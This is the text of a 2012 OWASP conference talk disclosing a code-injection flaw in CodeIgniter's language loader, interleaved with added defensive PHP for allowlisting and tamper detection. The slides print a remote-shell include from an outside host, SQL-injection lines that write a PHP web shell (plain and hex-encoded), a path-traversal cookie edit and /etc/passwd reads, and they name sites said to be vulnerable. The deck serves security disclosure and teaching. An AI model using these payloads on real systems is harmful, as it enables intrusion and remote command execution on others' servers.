CodeIgniter i18n Security Flaw

CodeIgniter i18n Code Injection
Abbas Naderi (aka AbiusX)
OWASP Chapter Leader of Iran
ISSECO Member
[email protected] / [email protected]
20 May 2012


Page 1: CodeIgniter i18n Security Flaw

CodeIgniter i18n Code Injection

Abbas Naderi (aka AbiusX)
OWASP Chapter Leader of Iran
ISSECO Member
[email protected] / [email protected]

20 May 2012

Page 2: CodeIgniter i18n Security Flaw

Understand the Context

Page 3: CodeIgniter i18n Security Flaw

PHP

• Most used SSI (75%)
• 17 years of maturity
• Open-source nature
• Rapid develop/deploy
• Secure core
• Insecure libraries
• Low-level web development

Page 4: CodeIgniter i18n Security Flaw

PHP Frameworks

• PHP low-level web support
• Incorporation of frameworks
• Much used and mature -> secure
• Huge codebase -> insecure
• Developers, not security guys
• Security-oriented frameworks (OWASP ESAPI)

Page 5: CodeIgniter i18n Security Flaw

CodeIgniter

• Most used Mid-level Framework

Page 6: CodeIgniter i18n Security Flaw

Internationalization

• i18n importance today
• Difficult implementation:
  – File-based (WordPress, eFront, …)
  – Database (jFramework)
  – Code-based (CodeIgniter, …)
• Obsolete consumers -> no testing

Page 7: CodeIgniter i18n Security Flaw

Remote File Inclusion

Page 8: CodeIgniter i18n Security Flaw

RFI at a glance

• 3rd most common vuln. in Top Ten 2007: Malicious File Inclusion
• Not in Top Ten 2010: mostly understood and fixed
• Highest impact (run arbitrary code!)
• Common in interpreted languages
• Most common in PHP (why?)

Page 9: CodeIgniter i18n Security Flaw

RFI Example

<?php
$page = $_GET['page'];
include "./pages/{$page}.php";

Malicious input:

Mysite.com?page=../../../etc/passwd%00

Where the current directory is /var/www:

include "/var/www/pages/../../../etc/passwd";
= include "/etc/passwd"; // shows it on screen

Page 10: CodeIgniter i18n Security Flaw

RFI Cheatsheet

Use a null character in the input to terminate the string:
include "./{$page}.you.cant.rfi.me.php";

Use absolute paths if the input starts the include:
include "{$_GET['page']}";

page=http://abx.ir/shell.txt%00
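The two slides above show the vulnerable include and the two tricks (null byte, input at the start of the path) used against it. Below is a hardened version of that same page-loading snippet, added here as an example and not taken from the slides: the request value is reduced to a short identifier, matched against an allowlist, and the resolved file is checked to lie inside the pages directory. The directory layout (`./pages/<name>.php`) and the allowlist contents are assumptions. Including a URL would additionally need `allow_url_include`, which has shipped Off since PHP 5.2, so the checks concentrate on local paths.

```php
<?php
// Added example (not from the slides): a hardened version of the "RFI Example"
// include, using an allowlist plus a realpath containment check.
declare(strict_types=1);

const PAGES_DIR     = __DIR__ . '/pages';             // assumed layout: ./pages/<name>.php
const ALLOWED_PAGES = ['home', 'about', 'contact'];   // assumed allowlist of page names

/**
 * Return the absolute path of the page file to include, or null when the
 * request must be rejected. This function never includes anything itself.
 */
function resolvePage(string $page): ?string
{
    // 1. A NUL byte is only ever there to cut off the appended ".php";
    //    reject it outright (modern PHP also refuses it in include paths).
    if (strpos($page, "\0") !== false) {
        return null;
    }
    // 2. Only a short identifier is acceptable: no "/", "\", "..", ":" or a
    //    wrapper prefix such as "http://" survives this pattern.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $page)) {
        return null;
    }
    // 3. Allowlist: the name must be a page the application actually ships.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    // 4. Defence in depth: the resolved file must sit under PAGES_DIR even if
    //    the checks above are loosened later.
    $base = realpath(PAGES_DIR);
    $file = realpath(PAGES_DIR . '/' . $page . '.php');
    if ($base === false || $file === false
        || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

$page = $_GET['page'] ?? 'home';
$file = resolvePage($page);
if ($file === null) {
    http_response_code(404);
    exit('No such page');
}
include $file;
```

The allowlist is what actually closes the hole; the pattern and the realpath check only limit the damage if someone later extends the code to accept names from a database or a configuration file.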

Page 11: CodeIgniter i18n Security Flaw

allow_url_include

If "URL fopen wrappers" are enabled in PHP (which they are in the default configuration), you can specify the file to be included using a URL (via HTTP or other supported wrapper) instead of a local pathname.

e.g. include "ftp://192.168.1.1/file.txt";

Page 12: CodeIgniter i18n Security Flaw
Page 13: CodeIgniter i18n Security Flaw

Filter Parameters

• CodeIgniter has the least found exploits on all major PHP frameworks (Commercial Codebase)

• CodeIgniter filters dangerous characters such as ', ", /, ?, <, > in GET parameters, to prevent most XSS and injection attacks.

• CodeIgniter has central module loader, and MVC pattern, preventing most RFIs.

Page 14: CodeIgniter i18n Security Flaw

Internationalization

• system/core/Lang.php:

function load($langfile = '', $idiom = '', $return = FALSE, $add_suffix = TRUE, $alt_path = '')
{
    $langfile = str_replace('.php', '', $langfile);

    if ($add_suffix == TRUE)
    {
        $langfile = str_replace('_lang.', '', $langfile).'_lang';
    }

    $langfile .= '.php';

Page 15: CodeIgniter i18n Security Flaw

Internationalization (II)

    if (file_exists($package_path.'language/'.$idiom.'/'.$langfile))
    {
        include($package_path.'language/'.$idiom.'/'.$langfile);
        $found = TRUE;
        break;
    }

The $idiom is obtained from cookies as $_COOKIE['lang']

$langfile is the domain keyword, e.g. "sales"
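The load() code above builds the include path from two values, the idiom (taken from a cookie) and the domain keyword, and the str_replace() normalisation leaves traversal sequences intact. The following is an added example of how the same lookup can be done safely; it is not CodeIgniter's own code. It validates the idiom against the language directories that are actually installed, requires the keyword to be a bare identifier, and pins the resolved file under language/. The helper names, the `[APPPATH]` package list and the default idiom are assumptions.

```php
<?php
// Added example, not CodeIgniter's own code: the two user-influenced inputs that
// reach the include() in CI_Lang::load() are checked before any path is built.
// Directory layout and the default idiom are assumptions.
declare(strict_types=1);

/**
 * Idioms that really exist: the sub-directories of one language/ directory.
 * Used as the allowlist, so a cookie can only name a shipped language.
 */
function installed_idioms(string $language_dir): array
{
    $out = [];
    foreach (scandir($language_dir) ?: [] as $entry) {
        if ($entry !== '.' && $entry !== '..' && is_dir($language_dir . '/' . $entry)) {
            $out[] = $entry;
        }
    }
    return $out;
}

/**
 * Resolve a language file the way Lang.php does, but only after both the
 * idiom (e.g. $_COOKIE['lang']) and the domain keyword (e.g. "sales") pass.
 *
 * @param string[] $package_paths directories searched, each ending in "/"
 * @param string[] $installed     allowlist, e.g. from installed_idioms()
 * @return string|null absolute path to include, or null to refuse
 */
function resolve_lang_file(array $package_paths, string $idiom, string $langfile, array $installed): ?string
{
    // A cookie is attacker-controlled and is not covered by the GET-parameter
    // filtering, so it gets exactly the treatment a URL parameter would:
    // a plain directory name that is also on the allowlist.
    if (!preg_match('/\A[a-z_]{2,32}\z/', $idiom) || !in_array($idiom, $installed, true)) {
        return null;
    }
    // The original normalises with str_replace('.php', ...) and
    // str_replace('_lang.', ...), which leaves "../" untouched; require a bare keyword.
    if (!preg_match('/\A[a-z0-9_]{1,40}\z/', $langfile)) {
        return null;
    }
    $langfile .= '_lang.php';

    foreach ($package_paths as $path) {
        $root = realpath($path . 'language');
        $real = realpath($path . 'language/' . $idiom . '/' . $langfile);
        // Same search order as the original loop, plus a containment check so
        // that whatever string operations produced still lies under language/.
        if ($root !== false && $real !== false
            && strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) === 0) {
            return $real;
        }
    }
    return null;
}

/** Pick the idiom for this request: the cookie if it is installed, else the configured default. */
function choose_idiom(?string $cookie_value, array $installed, string $default): string
{
    return ($cookie_value !== null && in_array($cookie_value, $installed, true)) ? $cookie_value : $default;
}

// Usage sketch for a controller (paths are assumptions):
// $installed = installed_idioms(APPPATH . 'language');
// $idiom     = choose_idiom($_COOKIE['lang'] ?? null, $installed, 'english');
// $file      = resolve_lang_file([APPPATH], $idiom, 'sales', $installed);
// if ($file !== null) { include $file; }
```

The important change is choose_idiom(): the cookie can only select among languages the application ships, and anything else silently falls back to the default, so a traversal string never reaches the path concatenation at all.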

Page 16: CodeIgniter i18n Security Flaw
Page 17: CodeIgniter i18n Security Flaw

Local File Inclusion

• Useful to extract info. from the target system:
  – /etc/passwd
  – ./config/database.php
• Easy to exploit

Page 18: CodeIgniter i18n Security Flaw

Local Code Inclusion

• Requires a blind injection:
  – ' and 1=0 union select "<?php echo shell_exec($_REQUEST[q]); " into outfile "/tmp/sales_lang.php" --
  – CodeIgniter filters <? from input
  – ' and 1=0 union select unhex("3c3f706870206563686f207368656c6c5f6578656328245f524551554553545b715d29") into outfile "/tmp/common_lang.php" --
  – Caution: into outfile does not overwrite!
  – Where to find blind injection?

Page 19: CodeIgniter i18n Security Flaw

Local Code Inclusion (II)

• Now change the cookie from
  – a%3A8%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22aa55f87c8b18afe75b3cd7baba330553%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22178.162.154.251%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.7%3B+rv%3A12%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221337541932%22%3Bs%3A3%3A%22lan%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22dir%22%3Bs%3A3%3A%22rtl%22%3Bs%3A4%3A%22lang%22%3Bs%3A2%3A%22fa%22%3Bs%3A3%3A%22alg%22%3Bs%3A5%3A%22right%22%3B%7Db3c9bed5e9656eca61938c9bc6965bad
  – to lang%22%3Bs%3A2%3A%22../../../../../tmp
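The cookie edit shown above leaves traces that a server can look for: the serialized length no longer matches the value, and the value contains a traversal sequence and is not one of the installed idioms. The following is an added detection example (not part of the slides) that extracts the lang field from a URL-encoded, PHP-serialized session cookie and returns the indicators it finds. The two sample cookies are constructed for the example, and the installed-idiom list is an assumption; the function is meant to run server-side at request time or over logged cookie headers.

```php
<?php
// Added example (not from the slides): server-side detection of tampered
// "lang" values in a CodeIgniter-style session cookie. The sample cookies
// below are constructed for the example and are not captured data.
declare(strict_types=1);

const INSTALLED_IDIOMS = ['english', 'fa']; // assumed set of shipped language directories

/**
 * Pull the lang field out of a URL-encoded, PHP-serialized session cookie.
 * Returns [value, declared_length] or null when there is no lang field.
 */
function extract_lang_field(string $raw_cookie): ?array
{
    $decoded = urldecode($raw_cookie);
    // Do not trust the declared length: read up to the closing quote instead,
    // so a field whose contents were edited by hand is still seen whole.
    if (!preg_match('/s:4:"lang";s:(\d+):"([^"]*)"/', $decoded, $m)) {
        return null;
    }
    return [$m[2], (int) $m[1]];
}

/**
 * Return the list of indicators found for the lang field of one cookie.
 * An empty list means the value looks like an ordinary idiom name.
 */
function assess_lang_cookie(string $raw_cookie, array $installed = INSTALLED_IDIOMS): array
{
    $field = extract_lang_field($raw_cookie);
    if ($field === null) {
        return [];
    }
    [$value, $declared] = $field;
    $found = [];
    if (strlen($value) !== $declared) {
        $found[] = 'length_mismatch';   // serialized length no longer matches: hand-edited
    }
    if (strpos($value, "\0") !== false) {
        $found[] = 'null_byte';         // %00 used to cut off an appended suffix
    }
    if (preg_match('#(\A|/|\\\\)\.\.(/|\\\\|\z)#', $value)) {
        $found[] = 'path_traversal';    // "../" climbing out of language/
    }
    if (preg_match('#\A[a-z][a-z0-9+.\-]*://#i', $value)) {
        $found[] = 'url_wrapper';       // http://, ftp://, php://; only matters with allow_url_include
    }
    if ($value !== '' && ($value[0] === '/' || $value[0] === '\\')) {
        $found[] = 'absolute_path';
    }
    if (!in_array($value, $installed, true)) {
        $found[] = 'not_installed';     // anything outside the shipped idioms is worth logging
    }
    return $found;
}

// Constructed samples: a normal session and one whose lang field was edited.
$samples = [
    'normal'   => 's%3A4%3A%22lang%22%3Bs%3A2%3A%22fa%22%3B',
    'tampered' => 's%3A4%3A%22lang%22%3Bs%3A2%3A%22../../../../../tmp%22%3B',
];
foreach ($samples as $label => $cookie) {
    printf("%-9s %s\n", $label, implode(',', assess_lang_cookie($cookie)) ?: 'clean');
}
```

For the constructed samples the normal cookie reports clean and the tampered one reports length_mismatch, path_traversal and not_installed. The not_installed indicator alone is enough to reject the request; the other indicators are what you would alert on, since an ordinary client never produces them.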

Page 20: CodeIgniter i18n Security Flaw

Remote Code Inclusion

• Look at the code:
  include($package_path.'language/'.$idiom.'/'.$langfile);
• You a hacker? Tell me how!

Page 21: CodeIgniter i18n Security Flaw

Remote Code Inclusion (II)

$this->load->add_package_path()

Adding a package path instructs the Loader class to prepend a given path for subsequent requests for resources. As an example, the "Foo Bar" application package above has a library named Foo_bar.php. In our controller, we'd do the following:

$this->load->add_package_path(APPPATH.'third_party/foo_bar/');

http://codeigniter.com/user_guide/libraries/loader.html

Page 22: CodeIgniter i18n Security Flaw

Demonstration

Page 23: CodeIgniter i18n Security Flaw
Page 24: CodeIgniter i18n Security Flaw

CodeIgniter + i18n

• More than 240 sites discovered:
  – http://www.sedoparking.com
  – http://bambooinvoice.org/
  – http://www.haughin.com/
  – http://www.rapyd.com/
  – http://code-igniter.ru/
• And tons more…

Page 25: CodeIgniter i18n Security Flaw

Questions? Feedback?

Abbas Naderi (aka AbiusX)

OWASP Chapter Leader of Iran

ISSECO Member

[email protected] / [email protected]
